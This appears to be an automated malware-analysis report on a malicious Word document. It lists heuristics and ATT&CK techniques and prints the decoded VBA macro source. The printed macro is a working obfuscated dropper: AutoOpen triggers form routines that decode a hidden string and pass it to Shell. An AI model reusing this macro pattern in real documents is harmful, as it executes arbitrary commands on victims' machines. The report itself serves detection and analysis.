MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Word document containing VBA macros. The Autoopen macro is designed to execute when the document is opened, likely to display a deceptive message prompting the user to enable content. The presence of a Shell() call in the VBA code indicates an attempt to execute arbitrary commands, suggesting it's a downloader or dropper for further malicious activity. The document body itself is a lure for this macro execution.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2934 bytes |
SHA-256: 581d6ceca7bdd09c907417e0f28ecee55d0779bfdfc7f4bd6a1187ee4a90a737 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
validateSettingsForm ("max")
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4C1E977F-12F6-4C20-81EB-A5E86BD71A09}{F904A548-3387-40DC-BADB-3FD1FC0D7F9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
UserForm1.ComboBox1.Text = ind1
End Sub
Private Sub CommandButton1_Click()
End Sub
Private Sub ValidText_Change()
Dim bol2 As Integer
With UserForm1
Dim str As String
str = .ValidText
bol2 = Len(str)
Dim bol1 As String
bol1 = "Vi"
fh = "2"
doveryboll bol2
End With
End Sub
Private Sub CommandButton2_Click()
End Sub
Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then OpenDateForm
End Sub
Private Sub ComboBox1_Change()
End Sub
Attribute VB_Name = "Module1"
Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub
Sub tomorrow(ByRef br1, ByRef bm, xy)
Dim log2 As Integer
log2 = Len(UserForm1.Text1)
If br1 < log2 Then
b = ""
With UserForm1
doc_print_header .Text1, br1, b
If xy <> b Then
br1 = br1 + 1
tomorrow br1, bm, xy
Else
bm = br1
End If
End With
End If
End Sub
Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub
Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
Else
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub
Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub
Sub doveryboll(m)
Dim n As Integer
Dim sad As String
With UserForm1
sad = "" + .ValidText
n = m - 415
End With
If m = 415 Then Shell sad, n
End Sub
Sub validateSettingsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub
Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
tomorrow sb1, arg1, per2
End Sub
Sub OpenDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.